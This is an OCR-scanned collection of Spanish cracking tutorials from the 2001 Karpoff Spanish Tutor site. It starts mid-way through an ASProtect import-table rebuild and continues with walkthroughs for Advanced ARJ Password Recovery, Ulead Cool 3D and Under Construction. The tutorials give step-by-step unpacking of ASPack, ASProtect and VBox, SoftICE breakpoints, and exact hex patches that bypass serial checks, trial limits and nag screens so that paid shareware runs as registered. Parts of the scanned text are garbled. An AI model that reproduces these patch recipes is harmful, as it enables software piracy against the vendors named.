el truco de todo esto es que exite una tabla de importaciones original dentro de la sección .data pero las únicas 
funciones que usa son las tres señaladas arriba, el resto está puesto como cebo. 


de hecho las direcciones de algunas importaciones contenidas en la sección .idata desempacada (ojo .idata, no .data) 
son correctas pero la mayoría apuntan a una tabla contenida en la dirección cbxxxx (en mi caso) que a su vez puede 
tener la dirección buena o encriptada. también tenemos unas llamadas indirectas a kernel32!getprocaddress en la citada 
tabla. 


vaya follón... 


de nuevo a la carga 


la tabla de importaciones 


tenemos cuatro casos diferentes en el código de la tabla de importaciones. los voy a enumerar según van apareciendo 
cuando se crea la sección .idata y pondré algunos ejemplos: 


1- la dirección real de la api es relocalizada en la tabla cbxxxx. 

edi = 004ec154, eax = 00cb45a4, ecx = bf2cce2e 

edi apunta a la dirección de la sección .idata que se está creando. el valor de eax en 00cb45a4 es e9 2e ce 2c bf. es 
decir, un salto con el desplazamiento contenido en ecx. así que, si cogemos eax le sumamos ecx y le añadimos los 5 
bytes correspondientes a la instrucción tendremos la dirección real donde apunta: 0Ocb4524 + bf2cce2e + 5 = bff813d7 
--> kernel32!getcurrentthreadid. 


2- llamada indirecta a getprocaddress 

edi = 004ec1a8, eax = 005alaa8, ecx = 0078fc6b 

el valor de ecx es fijo cada vez que la dirección (redirecionada en eax) de kernel32!getprocaddress se incorpora a la 
sección .idata.. con un d ecx vemos la cadena getprocaddress en la ventana de datos. 


3- la llamada a la api está encriptada dentro de la tabla cbxxxx. 

edi = 004ec220, eax = 00cb4701, ecx = 00000000 

el valor de eax es 68 04 48 cb, o sea que eax+1 contiene 00cb4804 que es la dirección que se copia a la tabla de 
importación. esta dirección nos manda a 00cb4962, de ahí a cb4a28 y por fin aterrizamos en 680e48cb --> advapi32.d1l 


4- la dirección de la api es copiada directamente a .idata 
edi = 004ec228, eax = 65341610, ecx = 0078fc4c 


no hay problema, el valor de eax, 65341610 --> oleaut32.dll, se copia directamente a la tabla. ecx es también fijo en 
este caso. 


volvemos a empezar 

acabamos de saltar después de cambiar el salto de comprobación del erc. ahora lo que necesitamos es lo siguiente: 
la dirección del código que genera la sección .idata. 

idem para el código que se usa para "desredireccionar" las direcciónes api del caso 3. 


una rango de direcciones vacio para insertar un pequeño trozo de código. 
la dirección de kerne132!getprocaddress. 


te ahorraré tiempo y molestias: 


e Ss O IfffEfEfFff ac 08 CO 74 e4 para el primer punto.(594606) 

e Ss O IfffFfFEfEf 55 8b ec 81 c4 f8 fe ff ff 53 56 para el segundo. (594300) 

e buscalo tu mismo, mueve la ventana de código hasta encontrar un montón de add [eax], al seguidos. 
e usa softice, para mi máquina es bff76dac. 


la busqueda para los dos primeros puntos hay que realizar así, ya que asprotect utiliza, cada vez que inicias el 
programa, unas direcciones de memoria diferentes y aparentemente aleatorias. si tienes ganas cambia las caracteristicas 
de la sección .data donde está el entry point a e0000020 y mete el programa en el loader de softice, si encuentras como 
lo hace, me llamas. (¿gettickcount tiene algo que ver en todo esto?). 


3.- conseguir una tabla de importaciónes "limpia". 


bueno a lo que íbamos, el código que crea la sección .idata es el siguiente, hemos aterrizado aquí después de un g 
[resultado busqueda primer punto]: 


:592606 ac lodsb 

:592607 0860 or al, al 

:592609 74e4 jz 0059a6ef 

:59460b 4e dec esi 

:59a60c 56 push esi 

:59460d 53 push ebx 

:59a60e 80£802 cmp al, 02 

:592611 7407 jz 0059a61a 

:594613 Ofb64e01 movzx ecx, byte ptr [esi+01] 
:592617 41 inc ecx 

:594618 eb05 ¡mp 0059261f 

:59a61a b904000000 mov ecx, 00000004 
:59261f 41 inc ecx 

:59a620 Olce add esi, ecx 

:592622 eSb5fdffff call 0059a3dc --> cambiamos el call por un ¡mp a la dirección libre. 
:594627 ab stosd 

:592628 ebde ¡mp 00594606 


supongamos que la dirección libre está en 0059b95c y que hemos encontrado la dirección 00594300 para 
desenmarañar las relocalizaciones del caso 3 (hay que asegurarse que la dirección encontrada queda dentro del rango 
de direcciones de asprotect), queda otra cosa por hacer. hay que "nopear" la dirección 00592300495 con tres 90, si no 
el call no regresa adecuadamente y el cuelge es seguro. los bytes a cambiar en 0059a300+95 son 89 45 04 por 90 90 
90. 


otra cosa, buscando una dirección libre y moviendo la ventana de código con avpag, nueve pantallas después del 
código de arriba, se encuentra el setz seguido de los dos jmp's, aprovechamos para ponerle un bp y acortar la busqueda 
del oep. 


metemos el siguiente código con softice: 


:59b95c call 005a3dc --> la llamada de arriba. 


:59b961 cmp ecx, 0078fc6b --> ¿es el caso 2%? 

:59b967 jz 0059b983 

:59b96c cmp ecx, 00 --> ¿es el caso 3"? 

:59b96c jz 0059b98a 

:59b96e cmp ecx, 0078fc4c --> ¿es el caso 4*? 

:59b974 jz 59b97d --> caso 4”, salta directamente y almacena. 

:59b976 add eax, ecx --> caso 1”, dirección relocalizada. 

:59b978 add eax, 5 

:59b97d stosd --> guarda en la dirección de la tabla apuntada por edi. 
:59b97e jmp 00594606--> vuelve arriba, al código que crea la tabla. 
:59b983 mov eax, bff76dac --> caso 2”, dirección de kernel32!getprocaddress. 
:59b988 ¡mp 0059b97d --> salta y guarda. 

:59b98a push dword ptr [eax+1] --> caso 3”, valor encriptado. 

:59b98d call 00594300 --> llamada a la rutina de desencriptación. 
:59b992 ¡mp 0059b97d --> salta y guarda. 


una vez ensamblado todo esto trazamos un rato con £10 para ver si funciona. una vez que estamos seguros le metemos 
un f5 para saltar al bp puesto en la instrucción setz. limpiamos los bp's y con f8 seguimos hasta el ret y ensamblamos la 
linea a jmp eip. 


4.- reconstruir el ejecutable obtenido. 
esta parte ya la conoces: 


volcado completo mediante procdump. 

volcar con fileinspector la sección .data que contiene el entry point del programa original. 
copiar manualmente con un editor hexadecimal la sección al archivo volcado. 

con procdump, cambiar el entry point por el que hemos hallado (oep - image base). 
finalmente, reconstruir la cabecera del archivo. 


copiamos el archivo prueba.exe al directorio advanced grapher y probamos, ...felicidades, ¡funciona!. 

las últimas defensas 
5.- después de todo esto y para finalizar, ¿que nos queda? 
pues queda la protección de un programa shareware, el límite de tiempo de 30 días. 
bpx getlocaltime, 11 y luego £f10 durante bastante rato hasta llegar a un cmp dword ptr [ebp-10], le. cambia el salto 
que sigue a esta instrucción y el progama no caducará pero, seguirá apareciendo la molesta pantalla del inicio del 
programa recordandote que es shareware, que hay que registrarse, etc... . 


¿el programa está registrado? justo encima de la comparación anterior tenemos: 


cmp byte ptr [ebp-05], 00 
jnz 4eSfTc 


invierte el salto y haz desaparecer la molesta "nagscreen" del inicio del programa. el programa piensa ahora que está 
registrado y funciona perfectamente. 


hacer desaparecer las referencias a ''unregistered copy" que quedan ya es cosa tuya. ahora puedes modificar el 
programa a tu antojo. 


tu mismo. 
buena caza. 


"a posteriori nada hay más sencillo 
que una utopía realizada." 


karpoff spanish tutor: página dedicada a la divulgación de información en castellano, sobre 


ingeniería inversa y programación. email "colabora con tus proyectos" 


Karpotff Spanish Tutor 2001 


Programa: Advanced ARJ Recorvery Password v2.0 

PROTECCION: Serial. 

Objetivo: Simular estar Registrados 

Descripcion: Pues eso. 

Dificultad: Aficionado 

DOWNLOAD : http://www .elcomsoft.com/ 

Herramientas: Softice, Editor HEx, File InsPEctor, Procdump, Caspr, w32dasm 

CRACKER: Profesor_X FECHA: 20/02/2001 
INTRODUCCION 


Hola Amigos otro programa mas que muerde el polvo como dice la canción de Queen " ANOTHER ONE BITES THE 
DUST ", J EJ EJ EJ E!!! este programilla verdaderamente me costo tres horas de mi tiempo para poderle quitar la 
protección , estos los de ELCOM SOFTWARE se merecen una fanfarria, ya que le pusieron varias protecciónes a sus 
sharewarecitos,que dificultan el analisis de sus programas....ya veran mas abajo en el apartado de cometario del 
programa como esta todo este TORITO........ 


AL ATAKE 


Comentario del Programa 


e Una grandiosa utilidad para recuperar password de archivos comprimidos en formato AR], este cuenta con las 
siguientes opciones de busqueda de Passwords. 


e ataque por fuerza bruta 
e ataque basado en diccionario 


Lo que nos interesa...el programa es shareware con libre uso de 30 días, y para registrarse hay que pagar $230 US por 


la version standart y $60 US por la version profesional, Ufff !!! es mucho....... jejejjejeje, el programa tiene las 


siguientes protecciones: 


2. Anti Dasm 


Objetivos 


1. Quitar la Protección del ASpack+ASprotec del Advanced ARJ Password Recovery v 2.0 que desde ahora lo 
llamaremos AAPR 

2. Quitar la protección AntiDasm (anti desensamble) para poder analizar el codigo. 

3. Parchar el programa para que seamos usuarios registrados 


Manos a la Obra 


Antes de abrir el programa lo analizamos con file insPEctor v4.0 el que nos mostrará información realmente 
importante a la hora de atacar el programa; bueno el file insPEctor nos mostrará los siguientes datos: 


e El programa está desarrollado en Microsoft Visual C++ 
e Empacado con ASpack+ASprotec 


A continuación... cerramos file insPEctor v4.0 y abrimos AAPR v 2.0 e inmediatamente entramos al programa : 


IEAAPR version 2.0 - Not registered 
Adyvanced ARJ Password Recovery 


o [7 


12/01/02 12:21:40 p.m. - APA versión 2.00 buld 172 lsunched, unragatered version: 
some features dtabled 


como nos podemos dar cuenta en la ventana de estado nos dice AAPR 2.0 launched, not 
registered....mmmmmm...sigamos analizando el programa....y nos encontramos que cuenta con una opción de 
al 
a 
registro 2 damos click en el icono de la llave y nos manda a la ventana de registro e inertamos cualquier 
numero y damos click en ok, inmeditamente esa ventana se torna de varios tamaños hasta que nos manda el 


mensaje 'YOUR CODE IS INVALID", 


Registration 


esa ventana tiene apariencia de una mesagebox ....mMmmmmmmmm....0k ya analizamos ahora si empesemos con 
el primer objetivo. 


Quitando la Protección 
ASpack+ASprotec 


ok! como sabemos ASpack y ASprotec son unos compresores de archivos, pero para estos casos tenemos una gran 
utileria para quitar esa protección que es el Caspr v 0.952 si no la tienes la puedes bajar de aqui 

http: //redrival.com/protools/unpackers.htm este es una utileria basada en Dos para poder descomprimir solo hay que 
copiar el ejecutable del programa que en este caso es aapr.exe y ponemos la siguiente instrucción : 


CASPR AAPR.EXE 


damos enter y empesara la descompresión, al terminar nos creara un archivo llamado AAPR.EX_ este sera el programa 
descomprimido....... ven que facil ahora borramos el AAPR.EXE y renombramos el AAPR.EX_ lo cambiamos a AAPR.EXE y 
listo primer objetivo finalizado. 


Quitando la Protección 
AntiDasm (AntiDesensamble) 


ahora abramos el programa descomprimido con el w32dasm y tratemos de desensamblarlo y lo empieza a 
desensamblar pero....solo nos muestra las: 


1. FUNCIONES IMPORTADAS 
2. DETALES DEL MODULO DE IMPORTACIÓN 


pero cuando llegamos al apartado de codigo desensamblado nos aparece esto 


FAA A AH 4444 ASSEMBLY CODE LISTING 944444444 + 44444444 
Jensen eo o le le ed od ol le le dd ol le le le Start of Code in Object A o o a od ole e ole 


Program Entry Point = 00401000 (AAPR.exe File Offset:00001000) 


despues de esto no aparece nada de nada de codigo ...mmmmmmm.... cerremos el w32dasm ok! ahora utilizaremos el 


instalado el Procdump v 1.6.2, si no lo tienes lo puedes bajar de aqui http:// redrival.com/ protools/ unpackers. htm , ok 
ahora ejecutemos Procdump v 1.6.2 y nos aparecera la siguiente ventana en la cual daremos click 


er ProcDump32 (C) 1998, 1999, 2000 G-RoM. Lonan 4 Stone 


en el boton PE-EDITOR y se abrira otra ventana en donde seleccionaremos el ejecutable AAPR.EXE que descomprimimos, 
al seleccionarlo y dar ok nos aparecera otra ventana como esta en la cual nos muestra el entrypoint, la medida de la 
imagen y la base de la imagen, despues damos 


PE Structure Editor 


en la cual daremos click con el boton derecho sobre cada sección de la columna llamada NAME y nos aparecera un 
menu emergente en el cual seleccionaremos EDIT SECTION y aparecera otra ventana en la cual cambiaremos en el 
apartado SECTION CHARACTERISTICS 


Modify section value 


En busca de la Instrucción a 
parchar 


ok! ahora abrimos el Softlce y ejecutamos el AAPR insertamos un numero de serie cualquiera que en mi caso insertare 
123456789 y antes de dar click en el boton de OK, damos CONTROL D y ponemos un brekpoint getdlgitemtexta y 
volvemos a dar CONTROL D , y damos click OK y saltamos directamente al Softlce , damos F12 una sola vez y 


caemos en esta parte del codigo: 


1:00411B68 2EFF1560954100 Call dword ptr cs: [00419560] E 
:00411B6F A184454200 mov eax, dword ptr [00424584] <-—CAEMOS AQUI 
:00411B74 0500020000 add eax, 00000200 

:00411B79 E8E4FCFEFFF call 00411862 

:00411B7E 85C0 test eax, eax <-- eax? 

:00411B80 7507 jne 00411B89 

:00411B82 89D8 mov eax, ebx 

:00411B84 E887FEFEFFF call 00411A10 


caemos directamente en la dirección de memoria 411B6F ok damos F10 dos veces y podemos ver que hay una CALL, 
una TEST y un JNE muy interesante, demos f10 hasta llegar a esta dirección de memoria 411B80 y damos ? eax como 


numero de serie y comprobarlo y de mandar un valor en EAX , para que en la instrucción TEXT EAX,EAX 
compruebe si fue el numero de serie correcto segun el valor mandado y almacenado en EAX 


EAX= 1 REGISTRADO 
EAX=0 NO REGISTRADO 


Ok despues de la comprobación se llevará acabo el salto hacia la direccion del mensaje de error si no es igual a 1, 


AAPR para que devuelva siempre en EAX UN VALOR DE 1 en la call que se encarga de todo el proceso de 
generacion y comprobación...... , Ok! ahora lo desensamblamos el AAPR con el W32DASM y nos vamos a la direccion 
de memoria 00411862 y vemos su offset que es 10C62 yen el editor hexadecimal abrimos el AAPR damos CONTROL 
G y nos abre una ventana en la cual ponemos el offset y damos click en ok!!! caemos directamente en este codigo en 
hexadecimal: 


5351 5256 5783 
lo cambiamos por 


BS01000000C3 


JEJEJEJEJEJE!!!!:D) CREO QUE ESTE ARROZ YA SE COCIO OTRA VEZ....... PROGRAMA 
CRACKEADO....... TERCER OBJETIVO COMPLETADO.......:) 
Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....Soy humano y cometo 
errores, si encuentras uno házmelo saber OK. PROFESOR X 


Saludos 


e Act MAgO 
e [DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa: Cool 3D v 3.00 


PROTECCION: Vbox € Nag 
Objetivo: Quitar la protección VBOX y Nag Screen 


este programa fue diseñado con una buena calidad en la programación y se especializa en crear 
textos animados y graficos en 3D para paginas web, tiene muy buenas caracteristicas y nuevas 
utilerias que le dan al usuario un gran poder y flexibilidad en el diseño de cualquier texto en 3D, si 
gustan ver un ejemplo, al principio de la pagina aparece una imagen la cual fue creada con el 


Descripcion: Ñ Ar a 
mencionado programa...la verdad es el que mas me gusta y utilizo para la creación de 
logotipos....un aplauso para estos cuates de Ulead ya que es un buen programa..... lo unico que 
tiene malo es la protección. una protección que a mi parecer no se merece ese 
programa....jejejejje.. ya veran por que lo digo......... :) 

Dificultad: Newbie 

DOWNLOAD : http://www.ulead.com 

Herramientas: Softice, ProcDump, Editor HEx, File InsPEctor 

CRACKER: Profesor_X FECHA: 20/02/2001 

INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como quitar la protección 
VBOX v 4,1 y una molesta Nag Screen al Cool 3D v 3.0, de la empresa Ulead Systems que se 
especializa en desarrollar utilerias " por cierto muy buenas " para diseño en 3D........ como podran 
ver aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual pondremos la 
calificacion que se merece segun mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Ahora lo primero es analizar con que esta hecho el Cool 3D v 3.0 que desde ahora lo llamaremos 3D, como primer 


paso vamos y analizamos el ejecutable del 3D con una de las grandiosas utilerias llamada Language 2000 v4.5.1.144 y nos 
mostrara lo siguiente: 


é C-WArchivos de programaWUlead Systems Willead COOL 3 


Analizando el Programa 


A LO QUE TE TRAJ E CHENCHA........... abrimos el programa y lo primero que nos aparece es una ventana como esta: 


Ulead COOL 3D 


Mead: 


Ulead COOL 3D 


como podemos ver en la ventanita nos dice que nos quedan 10 dias para evaluar el software..... mmm..si damos en TRY nos 
aparece otra ventanita como esta: 


% Ulead COOL 3D, Version 3.0 
25 Copyright [c) 1997-2000. Ulead Systems, Inc. 
Al Rights Reserved. 


Point yowr browser to www. wosd com for great tips and the latest 
news about Ulead COOL 30 and othes Ulead. 


(E ok lo primero que haremos será quitar la protección VBOX, vamos y 
abrimos el PROCDUMP V 1.6 y seleccionamos UNPACK luego VBOX DIALOG y damos click en OK y seleccionamos el 


ejecutable del 3D y esperamos que salga la pantalla del VBOX y despues damos click en TRY y damos click en la ventanita 


siguiente para que se ejecute el programa, una vez ejecutandose el 3D vamos al procdump y damos click en el boton de 
aceptar: 


ProcDump Request 


; ! N Please hit OK when task is loaded [check TaskBar] 


y despues esperamos un momento y nos aparecera la ventan del VBOX otra vez y damos click TRY y nos esperamos unos 
segundos, nos aparecera en la ventana de procesos esto: 


Unpacker Status 


Tracer Status : 


Breakpoint reached at Ox004E 4028 
Setting breakpoint at Ox004E 5000 
Breakpoint reached at Ox004E5000 

Setting Memory Search Base to Ox004E5000 
String search in progress ..... 

Setting breakpoint at Ox004E5028 


Traced Lines:  ODOOODO0h 


Script ElP: OODODODOh 


despues de eso aparecera una ventana en la cual seleccionaras el lugar a donde grabaras el ejecutable sin la protección, le 
pones un nombre y das OK, despues aparecera esta ventana: 


ProcDump Unpack Message 


y N Process Successfully unpacked ] (ElP Ox004E5028] 


aga proteccion fregada........quiero aclararles que esta 


es la forma mas facil para fregar el VBOX , ya que existe la forma de desproteger manualmente..pero como dice un 
comercial en mi pais .... ESA ES OTRA HISTORIA. ..jejejjejjejje 


En busca de la Nag Screen 


ok!!! ahora vamos a buscar la Nag Screen, jejejejje....esto sera facil...quiero aclarar que este metodo que voy a ocupar 


sirve para el 99 %de las Nags Screens...... ok! ITIr, 


Bueno lo primero que hay que hacer es reinicar la PCera con el softice, despues vamos y ejecutamos el 3D al cual ya no 
tiene la protección VBOX, y que he nombrado cracked2.exe, nos aparecera una ventana como esta: 


Ulead COOL 3D 


ok como podemos ver es una Dialog Box...jejejjeje..... ahora damos CONTROL D y saltamos al SOFTICE y damos el 
comando TASK el cual nos mostrara la siguiente información : 


TaskName SS:SP StackTop StackBot StackLow TaskDB hQueue Events 
Cracked2 * 0000:0000 008CDO00 008D0000 5266 35BF 0000 
Win32s1 0000:0000 0066C000 00670000 28F6 26DF 0000 
Cpgalert 0000:0000 0066D000 00670000 1B86 2787 0000 
Mprexe 0000:0000 0072E000 00730000 1C86 1BF7 0000 
Spoo132 0000:0000  0063E000 00640000 1F4E 1D6F 0000 
MMTASK 345F:1F80  00B2 201€ 201c 3436 3477 0000 
MSGSRV32 0D7F:7CFO 0124 7D8E 7D8E OD9E 2097 0000 
KERNEL32 015F:1218 00027BD0O 00037BD0 00Cc7 2097 0000 


como podemos ver nos muestra todos las tareas que se encuentran en ejecución en windows, entonces podemos ver que se 
esta ejecutando el CRACKED2 ese es el 3D ya que yo le puse ese nombre para identificarlo... una vez localizado vamos y 
damos HWND CRACKED2 y damos enter, y el sice nos desplegara la siguiente información: 


Windows Windows 
Handle hQueue sz QOwner Procedure 


0578c(1) 29AF 132 [cracked2 +k45884(Dialog) |178F:000030B5 


Class Name 


en la cual podemos ver algo muy interesante ....jejjeje...ahora borremos todos los breakpoints y ponemos bmsg 0578 
wm_destroy despues damos CONTROL D y apretamos el boton de TRY MORE saltamos directamnte al sice con lo cual 
caemos directamente en esta parte del codigo: 


0167:00671805 FF15D8306700 CALL [USER32 !DialogBoxParamA] a 


0167:0067180B  8B0DC4426700 MOV ECX, [006742C4] 


como podemos ver una linea arriba de donde caemos vemos una llamada a DIALOGBOXPARAMA ...... jejejje 
lo tenemos ahora damos F12 dos veces y caemos en esta parte del codigo: 


EAX=00000001 EBX=00000000 ECX=C177F430 EDX=00000000 ESI=004E0078 
EDI=004DBB58 EBP=008CFD78 ESP=008CFB60 EIP=00476E61 od UL .s::z a PC 
Cs=0167 DS=016F ss=016F ES=016F FS=52C7 GS=0000 

<> v 

byte PROT (0) 
0030:00000000 00 00 00 00 65 04 70 00-16 00 79 0C 65 04 70 00 e.P...y.e.p.” 
0030:00000010 65 04 70 00 54 FF 00 FO-CC 93 00 FO DO 9B 00 FO. e.p.T...o....... S 
0030:00000020 00 00 97 11 28 00 79 O0C-DO 9B 00 FO DO 9B 00 FO Lars v 
0030:00000030 DO 9B 00 FO DO 9B 00 FO-9A 00 79 0C 65 04 70 00. ...oooo... Yy.e.p.v 
PROT32 

0167:00476E50 59 POP ECX dE 
0167:00476E51 40 INC EAX iS 
0167:00476E52 59 POP ECX 
0167:00476E53 8986C4000000 MOV [ESI+000000C4],EAX 
0167:00476E59 740E JZ 00476E69 
0167:00476E5B FF1558834B00 CALL [004B8358] 
0167:00476E61 85C0 TEST EAX, EAX CAEMOS AQUI 
0167:00476E63 0F8469030000 JZ 004771D2 
0167:00476E69 8DBEF8000000 LEA EDI, [ESI+000000F8] 
0167:00476E6F 6804010000 PUSH 00000104 
0167:00476E74 57 PUSH EDI 
0167:00476E75 53 PUSH EBX 
0167:00476E76 FF1578714B00 CALL [KERNEL32!GetModuleFileNameA] 
0167:00476E7C 57 PUSH EDI 


... Creo que ya 


0167:00476E7D FFr1584714B00 CALL [KERNEL32!1strlen] 


WINICE: Load32 0b3=0003 Add=016F:01C43000 Len=00001000 Mod=U3DRC2 


WINICE: Load32 0b3=0004 Add=016F:01C44000 Len=00036000 Mod=U3DRC2 


WINICE: Load32 0b3=0005 Add=016F:01C7A000 Len=00001000 Mod=U3DRC2 


Break due to BPX USER32!'DialogBoxParamA (ET=6.33 seconds) 


facilisimo...... abrimos el File Inspector y abrimos el exe del 3D le damos click en analizar y vamos a la seccion como se 
muestra en la imagen: 


en la seccion de RVA TO OFFSET ponemos la direccion de memoria donde se encuentra esa CALL y damos click en la 
carpetita con una flechita y en la casilla de junto nos muestra el OFFSET....ok ahora vamos al Hex Work Shop y buscamos 
el offset y caemos en la direccion a cambiar, donde pondremos: 


0076E4E |15C0 5940 5989 8604 0000 0074 0E90]..YOY...... a 

0076ESC|9090 9090 9085 CODF 8469 0300 008D/......... Lo... 
y guardamos los cambios, ejecutamos el programa yyyyyy!! MI. J EJ EJ EJ EJ EJJE..... nada de Dialog Box entra 
directamente al programa........... jejejjeje...bueno amigos ..... otra Vez ...... 


nO0TAS 


ESPERO ... les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking......... Soy humano y 
cometo errores, si encuentras uno házmelo saber OK. PROFESOR X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Saludos 


e Act MAgO 
e. ¡TeD 

e SIR DREAM 
e POTHEAD 


VluGo 


CrKViz 


[ DeK_OiN ] 
e Txeli 

e Kuato_Thor 
e CrkViz 

e CODE_MEX 
e Metamorfer 
e Txotxo 

e Raziel 

e Turbop 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www. tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 2001 
Programa:  — Under Construction v 2.90 


PROTECCION: Time Limite € Vbox 


Objetivo: Quitar la proteccion Vbox y tiempo de prueba. 


Un editor de paginas web con una gran versatilidad, con un gran archivo de ayuda para los que 
apenas empiezan en la creacion de paginas html. lo negativo de esta aplicacion es que no tiene 


Aaa edicion de la pagina WYSYWYG (WHAT YOU SEE IS WHAT YOU GET, esperemos que para futuras 
versiones incluyan esa opcion ya que si no quedara fuera del mercado...... jejejejje!!! 

Dificultad: Newbie 

DOWNLOAD : http://www.gplanet.com/uc98.htm 

Herramientas: ProcDump 

CRACKER: Profesor_X FECHA: 20/02/2001 


INTRODUCCION 


Hola Amigos otro programa mas que analizamos, en este tutorial veremos como quitar la proteccion llamada VBOX a Under 
Construction v 2.90, de la empresa Gplanet Software una empresa que se especializa en desarrollar esta gran utileria para la 
creación de paginas Web ........ como podran ver aumente una nueva seccion que se llama : VALORACION DEL SOFTWARE en la cual 
pondremos la calificacion que se merece segun mi punto de vista, tomando en cuenta los siguientes parametros: 


1. sistema de proteccion 


2. Funcionalidad 
3. Calidad en programación 


AL ATAKE 


Ahora lo primero es analizar con que esta hecho el Under Contruction v 2.90 que desde ahora lo llamaremos UC 


, lo analizaremos con una utileria muy buena que se llama Language 2000 v4.5.1.144 el que nos mostrará información 
realmente importante para la hora de atacar el programa; bueno el Language 2000 v4.5.1.144 nos mostrará los 
siguientes datos: 


pr - 
1 FlerackeariAmbient reality software Maszaraksh Capita 


nto . 


Massaraksh Capítal.scr | 
- po a 


Object Pascal | 
Pperprs 


Borland International 


http: //wm.borland. com/delphi/ ¡ 


programa y nos aparece esta ventanita tipica de las que pone un programa protegido con VBOX....;: 


Under Construction 


SS 
UNDER CONSTRUCTION A 


POWERFUL "ER ALJTHORNO SOFTWARE 


onstruction 93 -[E:'winfile 


web authoring made easy 


Under Construction 


GLOBAL PLANET 


mmmm....como podemos ver nos aparece en la parte inferior de la ventana un contador de tiempo con su 
respectivo string que dice 30 DAYS REMAINING ...jejeje..y en la parte media derecha de la ventana nos 
aparecen tres botones TRY-INFORMATION-QUIT........mmmmm..interesante... 


Usando el Procdump 


ok!!! ahora damos click en quit para salir del programa, y ejecutamos el Procdump y nos aparece la siguiente 
ventana: 


rocDump32 (C) 1998, 1999, 2000 G-RoM. Loria 


cdarchivos de programalartivial tookA... FFFFD4FB 
c:Varchivos de orocramalartviral look... FFFEO818 


en la cual daremos click en una de las opciones que verdaderamente nunca de los nunca habiamos usado """bueno al 
menos yo nunca la habia usado"""", damos click en BHRAMA SERVER una vez hecho eso nos desliega la siguiente 


ventana: 


ya estando asi ejecutadonse el BHRAMA SERVER , nos vamos al explorer de windows y vamos a la carpeta donde 
se instalo el PROCDUMP y nos metemos 


EX Explorando - predmp16 MES 


| guchivo. Edición Ver ha Favoos Herramientas Ayuda le] 
[£- 2 2 | E 2,3 
Copiar 


ly Ahés Ad: Subr Cortar ' Pegar Desha 
| Dirección [23 CAprcdmp16 +] 
¡_ Todas las carpetas x 
14 Esciitono - 
= 3 Mi PC 

+ ¿e Disco de 3% (Ac) 

ES Pilesor x [0-] 

+ UY Archévos de programa 


(S caspe 


$ (3 Corel50 

+4 | frogtice 

$ OY Kpcms 

$) Ey Mis documentos 

$ 3 pecdmp16 

$ [3 Program Files 
¿y Recycled 


$3 1) Windows 
(3) Impresoras 
(58) Panel de control 
(33) Acceso telefónico a redes 
(5] Tareas programadas y 


Í] 


y nos metemos a la carpeta llamada VBOX42 y ejecutamos el programita llamado UNBOX y nos aparecera una 
ventanita con la cual seleccionaremos el ejecutable del UNDER CONSTRUCTION y damos ok, y esperamos unos 
segundos y aparecera la ventana del programa UC en la cual daremos click en el boton llamado TRY y podremos ver 
en unos segundos mas que en la ventana del BHRAMA SERVER nos aparece lo siguiente: 


Process 0xFFC36CB7 Will be Dumped........... 


esperamos un poco mas y nos aparecera una ventanita en la cual seleccionaremos el lugar y el nombre del ejecutable 
del UC, le podemos poner CRACEKUNDER y damos click en Guardar y espereamos otros segundos mas y se 


PROGRAMA CRACKEADO.......JEJEJEJJEJEJ!!!! OTRO MAS QUE MUERDE EL POLVO!!! 
ANTOHER ONE BITES THE DUST.....111111! 


SALUDOS A TODOS... 


Nota 


Espero que les sirva de algo este tutorial para aumentar sus conocimientos en el arte del cracking....y les comento que 
este mismo metodo sirve para muchos programas protegidos con el VBOX ....Soy humano y cometo errores, si encuentras 
uno házmelo saber OK. PROFESOR X 


UNA COSA MUY IMPORTANTE SI QUIERES QUE TUS TUTORIALES APARESCAN EN LA COMPILACION DE TUTORIALES 2000 
MANDAMELOS A MI EMAIL...... 


Se que estan alla afuera, ya los siento, se que tienen miedo, nos tienen miedo a nosotros, tienen miedo del 
cambio..... voy a colgar este telefono y le voy a mostrar a la gente lo que ustedes no quieren que vea. Les voy a 
mostrar un mundo sin ustedes...un mundo sin reglas y controles...sin fronteras ni limites..... un mundo donde 

todo es posible... 
ADONDE VAMOS... ESO DEPENDE DE USTEDES...... 


'" THE MATRIX " 


Saludos 


e Act MAg0-- ¡TeD--VluGo -- CrKViz -- [ DeK_OiN ] -- Txeli -- Kuato_Thor -- CODE_ MEX -- Metamorfer -- 
Txotxo -- Raziel -- Turbop -- 


e Karpoff http://welcome.to/karpoff 


e Xasx de TNT! http://www.tntcrackers. ws 


e Viper ( creador de file insPEctor ) file insPEctor web site http:/ / www.finspec. swsites. net/ index. htm 


e Toda la people de TUTORIALES2000. 


e Saludos a todos los crackers del mundo. 


Chao!! 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


